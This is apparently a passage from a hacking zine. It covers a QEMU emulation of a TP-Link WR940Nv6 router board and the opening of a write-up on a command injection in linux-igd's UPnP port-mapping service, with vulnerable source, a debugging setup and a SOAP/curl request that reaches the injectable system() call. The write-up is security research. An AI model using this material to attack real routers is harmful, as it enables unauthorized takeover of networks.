loaderparams.initrd_filename,
initrd_offset, loaderparams.ram_size - initrd_offset);
}
if (initrd_size == (target_ulong) -1) {
error_report("could not load initial ram disk '%s'",
loaderparams.initrd_filename);
exit(1);
}
}
return entry;
}
static void main_cpu_reset(void *opaque)
{
ResetData *s = (ResetData *)opaque;
CPUMIPSState *env = &s->cpu->env;
cpu_reset(CPU(s->cpu));
env->active_tc.PC = s->vector;
}
static void connect_to_mmio_server(void){
int status;
struct sockaddr_in serv_addr;
if ((client_fd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
printf("\n Socket creation error \n");
return;
}
serv_addr.sin_family = AF_INET;
serv_addr.sin_port = htons(1337);
if (inet_pton(AF_INET, "127.0.0.1", &serv_addr.sin_addr)
<= 0) {
puts(
"\n[*] bruh...");
return;
}
if ((status
= connect(client_fd, (struct sockaddr*)&serv_addr,
sizeof(serv_addr))) < 0) {
puts("\n[-] Connection to the MMIO MITM interface failed...");
puts("[*] Is the MMIO MITM script even running?!?!");
exit(-1); // We need the interface to be up
return;
}
}
static int read_mmio_mitm(int address){
int valread, ret_val = 0;
char buffer[128] = { 0 };
snprintf(buffer, sizeof(buffer), "r0x%x", address);
send(client_fd, buffer, strlen(buffer), 0);
memset(buffer, 0, sizeof(buffer));
valread = read(client_fd, buffer, sizeof(buffer) - 1);
if (valread){
ret_val = strtol(buffer, NULL, 16);
}
return ret_val;
}
static int write_mmio_mitm(int address, int value){
int valread, ret_val = 0;
char buffer[128] = { 0 };
snprintf(buffer, sizeof(buffer), "w0x%x 0x%x", address, value);
send(client_fd, buffer, strlen(buffer), 0);
memset(buffer, 0, sizeof(buffer));
valread = read(client_fd, buffer, sizeof(buffer) - 1);
if (valread){
ret_val = atoi(buffer);
}
return ret_val;
}
// MMIO Callbacks for GPIO
static uint64_t gpio_mmio_read(void *opaque, hwaddr addr, unsigned size)
{
int base_addr = 0x18040000;
int ret_val = 0;
ret_val = read_mmio_mitm(base_addr + addr);
return ret_val;
}
static void gpio_mmio_write(void *opaque, hwaddr addr,
uint64_t val, unsigned size)
{
int base_addr = 0x18040000;
if (addr == 0x44){ // This is for UART Multiplexing, skip.
return;
}
write_mmio_mitm(base_addr + addr, val);
return;
}
static const MemoryRegionOps gpio_mmio_ops = {
.read = gpio_mmio_read,
.write = gpio_mmio_write,
.endianness = DEVICE_BIG_ENDIAN
};
// MMIO Callbacks for SPI
static uint64_t spi_mmio_read(void *opaque, hwaddr addr, unsigned size)
{
struct SPI_IO *spi_io = opaque;
switch (addr) {
case 0x0:
return 1;
case 0x8:
break;
case 0xC: // (SPI_READ_DATA_ADDR)
spi_io->cmd = ((spi_io->cmd & 0x0F) << 4 | (spi_io->cmd & 0xF0) >> 4
| (spi_io->cmd & 0xF000) >> 4 | (spi_io->cmd & 0xF00) << 4 |
(spi_io->cmd & 0xF0000) << 4 | (spi_io->cmd & 0xF00000) >> 4 |
(spi_io->cmd & 0xF000000) << 4 | (spi_io->cmd & 0xF0000000) >> 4);
if (spi_io->cmd == 0x9F){
spi_io->cmd = 0;
return 0x1337;
}
break;
default:
break;
}
return 0;
}
static void spi_mmio_write(void *opaque, hwaddr addr,
uint64_t val, unsigned size)
{
struct SPI_IO *spi_io = opaque;
switch (addr) {
case 0x0:
break;
case 0x8: // (SPI_IO_CONTROL_ADDR)
if ((val == 0x70000) && (spi_io->cmd_in_progress == 0)){
// CS0-2 are high which means disabled
// reset cmd offset and cmd
spi_io->cmd_offset = 0;
spi_io->cmd = 0;
spi_io->cmd_in_progress = 1;
}
else if ((val == 0x70000) && (spi_io->cmd_in_progress == 1)){
spi_io->cmd_in_progress = 0;
break;
}
if ((val & (1 << 8)) && (val & (1 << 18))){
// CS2 is low (active)
// SPI_Clock is high, so grab data value
if (spi_io->cmd_offset == 32){
break;
}
spi_io->cmd |= (val & 1) << spi_io->cmd_offset;
spi_io->cmd_offset++;
}
break;
default:
break;
}
return;
}
static const MemoryRegionOps spi_mmio_ops = {
.read = spi_mmio_read,
.write = spi_mmio_write,
.endianness = DEVICE_BIG_ENDIAN
};
// MMIO Callbacks for DDR
static uint64_t ddr_mmio_read(void *opaque, hwaddr addr, unsigned size)
{
int base_addr = 0x18000000;
int ret_val = 0;
ret_val = read_mmio_mitm(base_addr + addr);
return ret_val;
}
static void ddr_mmio_write(void *opaque, hwaddr addr,
uint64_t val, unsigned size)
{
int base_addr = 0x18000000;
write_mmio_mitm(base_addr + addr, val);
return;
}
static const MemoryRegionOps ddr_mmio_ops = {
.read = ddr_mmio_read,
.write = ddr_mmio_write,
.endianness = DEVICE_BIG_ENDIAN
};
struct fw_sections parse_wr940n_firmware_header(char *filename){
struct fw_header fw_header;
struct fw_sections fw_sections;
FILE *fptr;
memset(&fw_header, 0, sizeof(fw_header));
fptr = fopen(filename, "rb");
fseek(fptr, 0,SEEK_SET);
size_t read = fread(&fw_header, 1, sizeof(fw_header), fptr);
if (read != sizeof(fw_header)){
printf("[-] Error while reading fw image %s\n", filename);
printf("[-] Read size: %ld\n", read);
}
// We need to swap since we're on AyyMD64
fw_header.version = bswap_32(fw_header.version);
fw_header.hw_id = bswap_32(fw_header.hw_id);
fw_header.hw_rev = bswap_32(fw_header.hw_rev);
fw_header.kernel_la = bswap_32(fw_header.kernel_la);
fw_header.kernel_ep = bswap_32(fw_header.kernel_ep);
fw_header.fw_length = bswap_32(fw_header.fw_length);
fw_header.kernel_ofs = bswap_32(fw_header.kernel_ofs);
fw_header.kernel_len = bswap_32(fw_header.kernel_len);
fw_header.rootfs_ofs = bswap_32(fw_header.rootfs_ofs);
fw_header.rootfs_len = bswap_32(fw_header.rootfs_len);
fw_header.boot_ofs = bswap_32(fw_header.boot_ofs);
fw_header.boot_len = bswap_32(fw_header.boot_len);
fw_header.ver_hi = bswap_16(fw_header.ver_hi);
fw_header.ver_mid = bswap_16(fw_header.ver_mid);
fw_header.ver_lo = bswap_16(fw_header.ver_lo);
printf("[*] Vendor: %s\n", fw_header.vendor_name);
printf("[*] FW Version: %s\n", fw_header.fw_version);
printf("[*] fw_header.kernel_la: 0x%08x\n", fw_header.kernel_la);
printf("[*] fw_header.kernel_ep: 0x%08x\n", fw_header.kernel_ep);
printf("[*] fw_header.kernel_ofs: 0x%08x\n", fw_header.kernel_ofs);
printf("[*] fw_header.kernel_len: 0x%08x\n", fw_header.kernel_len);
printf("[*] fw_header.rootfs_ofs: 0x%08x\n", fw_header.rootfs_ofs);
printf("[*] fw_header.rootfs_len: 0x%08x\n", fw_header.rootfs_len);
printf("[*] fw_header.bootlen: 0x%08x\n", fw_header.boot_len);
printf("[*] fw_header.boot_ofs: 0x%08x\n", fw_header.boot_ofs);
printf("[*] fw_header.fw_length: 0x%08x\n", fw_header.fw_length);
fw_sections.boot_loader_len = fw_header.fw_length - 0x200;
fw_sections.bootloader = g_malloc(fw_sections.boot_loader_len + 1);
read = fread(fw_sections.bootloader, 1, fw_sections.boot_loader_len,
fptr);
if (read != fw_sections.boot_loader_len){
printf("[-] Error while reading from file: %s\n", filename);
}
return fw_sections;
}
static void
mips_wr940n_init(MachineState *machine)
{
const char *kernel_filename = machine->kernel_filename;
const char *kernel_cmdline = machine->kernel_cmdline;
const char *initrd_filename = machine->initrd_filename;
char *filename;
MemoryRegion *address_space_mem = get_system_memory();
MemoryRegion *gpio_mmio = g_new(MemoryRegion, 1);
MemoryRegion *ddr_mmio = g_new(MemoryRegion, 1);
Clock *cpuclk;
MIPSCPU *cpu;
CPUMIPSState *env;
ResetData *reset_info;
struct fw_sections fw_sections;
memset(&fw_sections, 0, sizeof(fw_sections));
// Connect to MMIO Server
connect_to_mmio_server();
cpuclk = clock_new(OBJECT(machine), "cpu-refclk");
clock_set_hz(cpuclk, 200 * 1000000); /* 200 MHz */
/* Init CPUs. */
cpu = mips_cpu_create_with_clock(machine->cpu_type, cpuclk);
env = &cpu->env;
reset_info = g_new0(ResetData, 1);
reset_info->cpu = cpu;
reset_info->vector = 0x9F000400;
qemu_register_reset(main_cpu_reset, reset_info);
/* Allocate RAM. */
memory_region_add_subregion(address_space_mem, 0, machine->ram);
/* bootloader */
filename = qemu_find_file(QEMU_FILE_TYPE_BIOS, machine->firmware ?:
BIOS_FILENAME);
if (filename) {
fw_sections = parse_wr940n_firmware_header(filename);
/* Map the BIOS / boot exception handler. */
memory_region_init_rom(bios, NULL, "WR940NV6.bios.rom",
fw_sections.boot_loader_len, &error_fatal);
memory_region_add_subregion_overlap(address_space_mem, 0x1F000000,
bios, 0);
rom_add_blob_fixed(filename, fw_sections.bootloader,
fw_sections.boot_loader_len, 0x1F000000);
g_free(filename);
}
if (fw_sections.bootloader == 0) {
/* we don't have a kernel image nor boot vector code.*/
error_report("Could not load TP-Link FW Image bios '%s'",
machine->firmware);
exit(1);
} else {
/* We have a boot vector start address. */
env->active_tc.PC = (target_long)(int32_t)0x9F000400;
}
/* GPIO */
memory_region_init_io(gpio_mmio, NULL, &gpio_mmio_ops, NULL,
"GPIO_MMIO", 0x74);
memory_region_add_subregion(address_space_mem, 0x18040000LL,
gpio_mmio);
/* SPI */
struct SPI_IO *spi_io = g_malloc0(sizeof(struct SPI_IO));
spi_io->spi_contents = g_malloc0(fw_sections.boot_loader_len+1);
memcpy(spi_io->spi_contents, fw_sections.bootloader,
fw_sections.boot_loader_len);
memory_region_init_io(spi_mmio, NULL, &spi_mmio_ops, spi_io,
"SPI_MMIO", 0x20);
memory_region_add_subregion_overlap(address_space_mem, 0x1F000000LL,
spi_mmio, 1);
/* DDR */
memory_region_init_io(ddr_mmio, NULL, &ddr_mmio_ops, NULL,
"DDR_MMIO", 0x160);
memory_region_add_subregion(address_space_mem, 0x18000000LL,
ddr_mmio);
if (kernel_filename) {
loaderparams.ram_size = machine->ram_size;
loaderparams.kernel_filename = kernel_filename;
loaderparams.kernel_cmdline = kernel_cmdline;
loaderparams.initrd_filename = initrd_filename;
reset_info->vector = load_kernel();
}
/* Init CPU internal devices. */
cpu_mips_irq_init_cpu(cpu);
cpu_mips_clock_init(cpu);
memory_region_init_alias(isa, NULL, "isa_mmio",
get_system_io(), 0, 0x00010000);
memory_region_add_subregion(get_system_memory(), 0x1fd00000,
isa);
}
static void mips_wr940n_machine_init(MachineClass *mc)
{
mc->desc = "TP-Link WR940NV6 Board by b1ack0wl";
mc->init = mips_wr940n_init;
mc->default_cpu_type = MIPS_CPU_TYPE_NAME("74Kf");
mc->default_ram_size = 1 * GiB; // for debug reasons
mc->default_ram_id = "mips_wr940n.ram";
}
DEFINE_MACHINE("WR940NV6", mips_wr940n_machine_init)
Header File (wr940n.h) * This needs to be put in the `qemu/include/hw/mips/` folder
#include <byteswap.h>
#include "hw/sysbus.h"
#include "chardev/char-fe.h"
struct fw_sections parse_wr940n_firmware_header(char *filename);
struct fw_sections{
char *bootloader;
int boot_loader_len;
char *kernel;
int kernel_len;
char *rootfs;
int root_fs_len;
};
/*
lifted from
https://github.com/jtreml/firmware-mod-kit/blob/master/src
/firmware-tools/mktplinkfw.c
*/
struct fw_header {
uint32_t version; /* header version */
char vendor_name[24];
char fw_version[36];
uint32_t hw_id; /* hardware id */
uint32_t hw_rev; /* hardware revision */
uint32_t unk1;
uint8_t md5sum1[16];
uint32_t unk2;
uint8_t md5sum2[16];
uint32_t unk3;
uint32_t kernel_la; /* kernel load address */
uint32_t kernel_ep; /* kernel entry point */
uint32_t fw_length; /* total length of the firmware */
uint32_t kernel_ofs; /* kernel data offset */
uint32_t kernel_len; /* kernel data length */
uint32_t rootfs_ofs; /* rootfs data offset */
uint32_t rootfs_len; /* rootfs data length */
uint32_t boot_ofs; /* bootloader data offset */
uint32_t boot_len; /* bootloader data length */
uint16_t ver_hi;
uint16_t ver_mid;
uint16_t ver_lo;
uint8_t pad[354];
};
struct SPI_IO {
/*< private >*/
SysBusDevice parent_obj;
/*< public >*/
MemoryRegion regs_region;
CharBackend chr;
char *spi_contents;
char model_number[5];
uint32_t read_offset;
uint32_t read_len;
uint8_t busy_flag;
uint32_t cmd;
uint8_t cmd_offset;
uint8_t cmd_in_progress;
};
Add this board to Qemu by modifying `qemu/hw/mips/meson.build` and adding in the following statement: `mips_ss.add(when: 'CONFIG_WR940N', if_true: files('0wl_wr940n_v6.c'))` Then, go into `qemu/hw/mips/Kconfig` and add in the following statements:
config WR940N
bool
select SERIAL
select MIPSNET
NOTE: The peripherals above are copied from MIPSSIM, but other included peripherals can be added if they can be utilized. (e.g XILINX UART) To run this board, just run the following command after building: `./qemu-system-mips -s -machine WR940NV6 -bios WR940NV6_FW_FILE (e.g. wr940nv6_us_3_20_1_up_boot(220801).bin)` The board will automatically extract the contents of the WR940Nv6 firmware blob, map the bootloader + kernel, and begin execution at Das U-Boot. You'll see the LED blink a few colors on the physical device and then the virtual board should crash due to a MMIO region not being allocated. It is up to the reader to complete the rest of the MMIO peripherals while using the MITM technique to either narrow in on a specific device (e.g. WiFi) or to simply see what's going on during the boot process or when a driver is interacting with it. Happy Hacking :) --[ References
/!\ AUTHOR_NOTE: If the above link 404s, go to the GPL code center
and look for WR940Nv6: https://www.tp-link.com/us/support/Sgpl-code/
|=-----------------------------------------------------------------------=| |=--------------=[ 7 - Shell Your Way to Network Mastery ]=--------------=| |=-----------------------------------------------------------------------=| |=------------------------=[ Gabriel & Thomas ]=-------------------------=| |=-----------------------------------------------------------------------=| 1 - Abstract 2 - Introduction 3 - White-box audit 4 - Compilation and debugging 5 - Becoming a Bash Jiu Jitsu white belt 6 - Becoming a Bash Jiu Jitsu purple belt 7 - Becoming a Bash Jiu Jitsu black belt 8 - Claiming supremacy over the mats 9 - Conclusion 10 - Acknowledgments 11 - References --------------------------------------------------------------------------- --[ 1. Abstract Control over LAN can be achieved by exploiting an old network service that opens a pathway through HTTP requests. By targeting a vulnerability in the service request's parsing of parameters, a patient attacker can force the execution of unauthorized commands as in a command line. This flow allows bypassing the built-in rulesets that would otherwise block such exploits, making it possible to gain deeper access. By carefully crafting unexpected HTTP requests while manipulating specific SOAP payloads, we can reach what we desire the most, the takeover of the network. --------------------------------------------------------------------------- --[ 2. Introduction Universal Plug and Play (UPnP) has long been a subject of concern due to its widespread use in simplifying network configurations, often at the expense of security. Originally designed to allow devices to automatically discover and configure themselves on a network, UPnP relies on the Internet Gateway Device (IGD), typically a router, to manage inbound and outbound traffic. However, the very features that make it convenient, such as automatic port forwarding and NAT traversal, also open doors to exploit. Over time, Linux IGD implementations, which allow Linux-based systems to perform similar functions, have become increasingly relevant in the threat landscape. Despite being an old service, UPnP and its related components still present a range of vulnerabilities that attackers can exploit. The next section will explore how a modified version of linuxigd (linux-igd)[1] can be exploited. --------------------------------------------------------------------------- --[ 3. White-box audit The focus of this analysis is on the implementation of linuxigd (linux-igd) and its derivatives, such as the reuse of its codebase within SDKs. The original code can be found on SourceForge[2]. The service was written in C++ at first, but the developers switched to C starting with version 0.95. +----------------------+----------+ | Version | Language | +----------------------+----------+ | gateway-0.71.tgz | C++ | | gateway-0.75.tgz | C++ | | gateway-0.90.tgz | C++ | | gateway-0.91.tgz | C++ | | linuxigd-0.92.tgz | C++ | | linuxigd-0.95.tar.gz | C | | linuxigd-1.0.tar.gz | C | +----------------------+----------+ While each version and its changes have been analyzed, the vendor seems to have modified version 1.0 for its SDK. The code examples below are based on the vendor's modified source code of the latest version of linuxigd (1.0). It is up to the reader through firmware analysis to identify examples where this service codebase is reused in SDKs. By reading the file pmlist.c source code, several command injections can be identified in the pmlist_AddPortMapping() and pmlist_DeletePortMapping() functions.
int pmlist_AddPortMapping(int enabled, char *protocol, char *externalPort,
char *internalClient, char *internalPort)
{
if (enabled)
{
...
char command[COMMAND_LEN];
int status;
{
...
snprintf(command, COMMAND_LEN, "%s -t nat -I %s -i %s -p %s"
" --dport %s -j DNAT --to %s:%s", g_vars.iptables,
g_vars.preroutingChainName, g_vars.extInterfaceName,
protocol, externalPort, internalClient, internalPort);
trace(3, "%s", command);
system(command);
...
}
if (g_vars.forwardRules)
{
snprintf(command, COMMAND_LEN, "%s -A %s -p %s"
" -d %s --dport %s -j ACCEPT", g_vars.iptables,
g_vars.forwardChainName, protocol, internalClient,
internalPort);
trace(3, "%s", command);
system(command);
...
}
...
}
return 1;
}
int pmlist_DeletePortMapping(int enabled, char *protocol,
char *externalPort, char *internalClient,
char *internalPort)
{
if (enabled)
{
...
char command[COMMAND_LEN];
int status;
{
...
snprintf(command, COMMAND_LEN, "%s -t nat -D %s -i %s -p %s"
" --dport %s -j DNAT --to %s:%s", g_vars.iptables,
g_vars.preroutingChainName, g_vars.extInterfaceName,
protocol, externalPort, internalClient, internalPort);
trace(3, "%s", command);
system(command);
...
}
if (g_vars.forwardRules)
{
snprintf(command, COMMAND_LEN, "%s -D %s -p %s"
" -d %s --dport %s -j ACCEPT", g_vars.iptables,
g_vars.forwardChainName, protocol, internalClient,
internalPort);
trace(3, "%s", command);
system(command);
...
}
...
}
return 1;
}
The creation of the string command, with elements controlled by an attacker supplied as a parameter to the system() function, raises a security issue. The pmlist_AddPortMapping() function is called by the pmlist_PushBack() function within the pmlist.c file.
int pmlist_PushBack(struct portMap* item)
{
int action_succeeded = 0;
...
if (action_succeeded == 1)
{
pmlist_AddPortMapping(item->m_PortMappingEnabled,
item->m_PortMappingProtocol,
item->m_ExternalPort, item->m_InternalClient,
item->m_InternalPort);
return 1;
}
else
return 0;
}
By analyzing the code above, it appears that the values supplied to the pmlist_AddPortMapping() function are not sanitized. This happens earlier in the call stack, specifically when the portMap structure is created and supplied to the pmlist_PushBack() function. This can be observed in the gatedevice.c file, where the AddPortMapping() function is defined. This function is called by the SOAP action handler HandleActionRequest(), which is registered by EventHandler() to process the associated HTTP request.
int AddPortMapping(struct Upnp_Action_Request *ca_event)
{
char *remote_host = NULL;
char *ext_port = NULL;
char *proto = NULL;
char *int_port = NULL;
char *int_ip = NULL;
char *int_duration = NULL;
char *bool_enabled = NULL;
char *desc = NULL;
struct portMap *ret, *new;
int result;
char num[5]; // Maximum number of port mapping entries 9999
IXML_Document *propSet = NULL;
int action_succeeded = 0;
char resultStr[RESULT_LEN];
if (
(ext_port = GetFirstDocumentItem(ca_event->ActionRequest,
"NewExternalPort")) &&
(proto = GetFirstDocumentItem(ca_event->ActionRequest,
"NewProtocol")) &&
(int_port = GetFirstDocumentItem(ca_event->ActionRequest,
"NewInternalPort")) &&
(int_ip = GetFirstDocumentItem(ca_event->ActionRequest,
"NewInternalClient")) &&
(int_duration = GetFirstDocumentItem(ca_event->ActionRequest,
"NewLeaseDuration")) &&
(bool_enabled = GetFirstDocumentItem(ca_event->ActionRequest,
"NewEnabled")) &&
(desc = GetFirstDocumentItem(ca_event->ActionRequest,
"NewPortMappingDescription")))
{
remote_host = GetFirstDocumentItem(ca_event->ActionRequest,
"NewRemoteHost");
...
if ((ret = pmlist_Find(ext_port, proto, int_ip)) != NULL)
{
trace(3, "Found port map to already exist. Replacing");
pmlist_Delete(ret);
}
new = pmlist_NewNode(atoi(bool_enabled), atol(int_duration), "",
ext_port, int_port, proto, int_ip, desc);
result = pmlist_PushBack(new);
...
}
...
}
The pmlist_NewNode() function, defined in the pmlist.c file, performs checks to ensure that the values contained in the SOAP request are valid. To clarify the information presented so far, the diagram below summarizes the call stack as neatly as possible. +------------------+ | main() | +------------------+ | v +------------------------+ | EventHandler() | +------------------------+ | v +---------------------------+ | HandleActionRequest() | +---------------------------+ | v +--------------------------+ | AddPortMapping() | +--------------------------+ / \ v v +------------------+ +---------------------+ | pmlist_NewNode() | | pmlist_PushBack() |<---+ +------------------+ +---------------------+ | | | | | | | +----struct portMap------|---------------+ | v +-------------------------+ | pmlist_AddPortMapping() | +-------------------------+ | v +------------+ | system() | +------------+
struct portMap* pmlist_NewNode(int enabled, long int duration,
char *remoteHost, char *externalPort,
char *internalPort, char *protocol,
char *internalClient, char *desc)
{
struct portMap* temp = (struct portMap*) malloc(
sizeof(struct portMap)
);
temp->m_PortMappingEnabled = enabled;
if (remoteHost && strlen(remoteHost) < sizeof(temp->m_RemoteHost))
strcpy(temp->m_RemoteHost, remoteHost);
else
strcpy(temp->m_RemoteHost, "");
if (strlen(externalPort) < sizeof(temp->m_ExternalPort))
strcpy(temp->m_ExternalPort, externalPort);
else
strcpy(temp->m_ExternalPort, "");
if (strlen(internalPort) < sizeof(temp->m_InternalPort))
strcpy(temp->m_InternalPort, internalPort);
else
strcpy(temp->m_InternalPort, "");
if (strlen(protocol) < sizeof(temp->m_PortMappingProtocol))
strcpy(temp->m_PortMappingProtocol, protocol);
else
strcpy(temp->m_PortMappingProtocol, "");
if (strlen(internalClient) < sizeof(temp->m_InternalClient))
strcpy(temp->m_InternalClient, internalClient);
else
strcpy(temp->m_InternalClient, "");
if (strlen(desc) < sizeof(temp->m_PortMappingDescription))
strcpy(temp->m_PortMappingDescription, desc);
else
strcpy(temp->m_PortMappingDescription, "");
temp->m_PortMappingLeaseDuration = duration;
temp->next = NULL;
temp->prev = NULL;
return temp;
}
To identify the length of each structure field, it is sufficient to read its definition in the pmlist.h file.
struct portMap
{
int m_PortMappingEnabled;
long int m_PortMappingLeaseDuration;
char m_RemoteHost[16];
char m_ExternalPort[6];
char m_InternalPort[6];
char m_PortMappingProtocol[4];
char m_InternalClient[16];
char m_PortMappingDescription[50];
int expirationEventId;
long int expirationTime;
struct portMap* next;
struct portMap* prev;
} *pmlist_Head, *pmlist_Tail, *pmlist_Current;
The definition of the above structure highlights that, regardless of the circumstances, the attacker is limited in the number of characters he can inject into the various fields of the SOAP request, thereby restricting the commands he can use to exploit the command injection. --------------------------------------------------------------------------- --[ 4. Compilation and debugging To study the service's behavior during execution, it is highly recommended to compile it from source and debug it to streamline the development phase of the exploit. The compilation phase was likely the most troublesome. As the service's source code was quite outdated, it took numerous tests and failures before a solution was found. The solution was to compile and run the service in a virtual machine (x86_64) using QEMU, with Fedora 21 selected as the guest operating system. It is not necessary to allocate much storage space, as this machine will only run the sshd service (for administration) and the targeted service. A disk can be created with the following command. $ qemu-img create -f qcow2 fedora21.qcow2 20G Once the disk is created, the next step is to launch QEMU, specifying the path to the ISO (the download link is provided in the references section[3]), and perform a standard Fedora 21 installation. $ qemu-system-x86_64 \ -m 4G \ -smp 4 \ -cdrom Fedora-Live-Workstation-x86_64-21-5.iso \ -drive file=fedora21.qcow2,format=qcow2 \ -boot d \ -net nic\ -net user \ -vga std \ -display default Once the operating system is installed on the guest machine, the VM can be powered off and then restarted using the command below. $ qemu-system-x86_64 \ -m 4G -smp 4 \ -drive file=fedora21.qcow2,format=qcow2 \ -net nic \ -net user,hostfwd=tcp::2222-:22 \ -vga std \ -display default The libupnp[4] library must be compiled before linux-igd because it depends on it to implement the UPnP Internet Gateway Device (IGD) protocol. Since linux-igd links against libupnp during compilation, failing to compile libupnp first will result in build errors due to missing headers and libraries. Therefore, compiling libupnp first ensures that the required dependencies are available for successfully building linux-igd. According to the linux-igd installation file INSTALL, we must first compile version 1.3.1[5] of the libupnp library. $ tar -xf libupnp-1.3.1.tar.gz $ cd libupnp-1.3.1/ $ ./configure $ make -j4 $ sudo make install The targeted service can then be compiled. $ tar -xf linuxigd-1.0.tar.gz $ cd linuxigd-1.0/ $ make -j4 $ sudo make install Following the installation of linux-igd, the following files have been added to the system. /etc/ |__ linuxigd/ | |__ dummy.xml | |__ gateconnSCPD.xml | |__ gatedesc.xml | |__ gateicfgSCPD.xml |__ upnpd.conf To have a functional service that simulates a real network device, our virtual machine needs two interfaces: - WAN interface (created as a dummy interface) - LAN interface (the one we are connected to via SSH). $ sudo ip link add name dummy0 type dummy $ sudo ip link set dummy0 up $ sudo ip addr add 192.168.13.37/24 dev dummy0 To verify that the interface has been correctly created and configured, use the following command. $ ip addr show dummy0 Once the tests are complete, it can be deleted using the following command. $ sudo ip link delete dummy0 To set up debugging, use GDB to place a breakpoint on the system() function call but first, set the debug_mode value in the file /etc/upnpd.conf as follows (to improve debugging). # Daemon debug level. Messages are logged via syslog to debug. # 0 - no debug messages # 1 - log errors # 2 - log errors and basic info # 3 - log errors and verbose info # default = 0 debug_mode = 3 The service can then be started using the following command. $ sudo LD_LIBRARY_PATH=/usr/local/lib upnpd -fTo debug with GDB, simply retrieve the PID of the process associated with the service. $ ps auxf|grep upnpd $ gdb -p $ (gdb) break system $ (gdb) c Now that the service is up and running and the debugging setup is complete, the next step is to interact with it. To do this, we need to review the contents of the gatedesc.xml and gateconnSCPD.xml files which are located in /etc/linuxigd/. Although we were not always fans of AI, we have come to realize that, as the saying goes, "Only fools do not change their minds!' With that in mind, it might be worthwhile to use a Large Language Model (LLM) based on the GPT-4 architecture to parse the XML files and generate the necessary HTTP requests for interacting with the service. This approach is especially useful when working with a service that has been enhanced with new features (but still based on linux-igd within the SDK). For instance, ChatGPT was able to provide the HTTP requests to reach the vulnerable function pmlist_AddPortMapping().
POST /upnp/control/WANIPConn1 HTTP/1.1
Host: 127.0.0.1:49152
Content-Type: text/xml; charset="utf-8"
SOAPAction: "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"
Content-Length: 704
<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:urn="urn:schemas-upnp-org:service:WANIPConnection:1">
<soapenv:Header/>
<soapenv:Body>
<urn:AddPortMapping>
<NewRemoteHost></NewRemoteHost>
<NewEnabled>1</NewEnabled>
<NewLeaseDuration>1</NewLeaseDuration>
<NewPortMappingDescription>POC</NewPortMappingDescription>
<NewProtocol>AAA</NewProtocol>
<NewExternalPort>BBBBB</NewExternalPort>
<NewInternalClient>CCCCCCCCCCCCCCC</NewInternalClient>
<NewInternalPort>DDDDD</NewInternalPort>
</urn:AddPortMapping>
</soapenv:Body>
</soapenv:Envelope>
Once the request is sent using curl, the following behavior can be monitored. $ curl -v \ -d @body.soap \ -H 'Content-Type: text/xml; charset="utf-8"' \ -H 'SOAPAction: "...IPConnection:1#AddPortMapping"' \ 'http://127.0.0.1:49152/upnp/control/WANIPConn1' $ sudo LD_LIBRARY_PATH=/usr/local/lib upnpd -f dummy0 ens3 upnpd[1878]: Initializing UPnP SDK ... upnpd[1878]: UPnP SDK Successfully Initialized. upnpd[1878]: Setting the Web Server Root Directory to /etc/linuxigd upnpd[1878]: Succesfully set the Web Server Root Directory. upnpd[1878]: Registering the root device with descDocUrl http://10.0.2.15:49152/gatedesc.xml upnpd[1878]: IGD root device successfully registered. upnpd[1878]: Advertisements Sent. Listening for requests ... upnpd[1878]: ActionName = AddPortMapping upnpd[1878]: appended 1 AAA BBBBB CCCCCCCCCCCCCCC DDDDD 1 upnpd[1878]: /sbin/iptables -t nat -I PREROUTING -i dummy0 -p AAA --dport BBBBB -j DNAT --to CCCCCCCCCCCCCCC:DDDDD upnpd[1878]: /sbin/iptables -A FORWARD -p AAA -d CCCCCCCCCCCCCCC --dport DDDDD -j ACCEPT upnpd[1878]: ScheduleMappingExpiration: DevUDN: uuid:XXXXXXXX-XXXX-XXXX-XXX X-XXXXXXXXXXXX ServiceID: urn:upnp-org:serviceId:WANIPConn1 Proto: AAA ExtPort: BBBBB Int: CCCCCCCCCCCCCCC.DDDDD at: Mon Jan 1 00:00:00 1970 eventId: 0 upnpd[1878]: PortMappingNumberOfEntries: 1 upnpd[1878]: AddPortMap: DevUDN: uuid:XXXXXXXX-XXXX-XXXX-8e6c-XXXXXXXXXXXX ServiceID: urn:upnp-org:serviceId:WANIPConn1 RemoteHost: (null) Prot: AAA ExtPort: BBBBB Int: CCCCCCCCCCCCCCC.DDDDD upnpd[1878]: ExpireMapping: Proto:AAA Port:BBBBB upnpd[1878]: /sbin/iptables -t nat -D PREROUTING -i dummy0 -p AAA --dport BBBBB -j DNAT --to CCCCCCCCCCCCCCC:DDDDD upnpd[1878]: [HIT 3] /sbin/iptables -D FORWARD -p AAA -d CCCCCCCCCCCCCCC --dport DDDDD -j ACCEPT upnpd[1878]: ExpireMapping: UpnpNotifyExt(deviceHandle,uuid:XXXXXXXX-XXXX-X XXX-XXXX-XXXXXXXXXXXX,urn:upnp-org:serviceId:WANIPConn1,propSet) PortMappingNumberOfEntries: 0 Please note that after the HTTP request was sent, four system commands were executed. For clarity, we will summarize them as follows, with the portions before the first injection point replaced by "U". $ U AAA --dport BBBBB -j DNAT --to CCCCCCCCCCCCCCC:DDDDD $ U AAA -d CCCCCCCCCCCCCCC --dport DDDDD -j ACCEPT $ U AAA --dport BBBBB -j DNAT --to CCCCCCCCCCCCCCC:DDDDD $ U AAA -d CCCCCCCCCCCCCCC --dport DDDDD -j ACCEPT It is evident that commands one and three are identical, as are commands two and four. To summarize, here are the commands that were executed once the request was processed by the service. $ U AAA --dport BBBBB -j DNAT --to CCCCCCCCCCCCCCC:DDDDD $ U AAA -d CCCCCCCCCCCCCCC --dport DDDDD -j ACCEPT Now, the fun begins! --------------------------------------------------------------------------- --[ 5. Becoming a Bash Jiu Jitsu white belt Currently, it is possible to inject ourselves into two different commands at several locations within these commands. However, we must, overcome two problems. 1. We control exactly 28 characters ("AAA", "BBBBB", "CCCCCCCCCCCCCCC", "DDDDD") in the first command and 23 in the second. 2. Our injection points are discontinuous and there are elements (command options) between our different injection points. The backtick or backquote (`) in shell scripting is used for command substitution, where the shell executes the command inside the backticks and replaces the backtick expression with the output of the command. It is supported by many Unix-like shells, including sh (Bourne Shell), bash (Bourne Again Shell), ash (Almquist Shell) and dash (Debian Almquist Shell). +-------+----------------+------------------------------------------------+ | Shell | "`" Supported? | Version(s) Supporting Backquotes | +-------+----------------+------------------------------------------------+ | sh | Yes | All versions (all modern POSIX-compliant) | | bash | Yes | All versions (from 1.0 in 1989 to present) | | ash | Yes | All versions (since 1989, including BusyBox) | | dash | Yes | All versions (since 2001) | 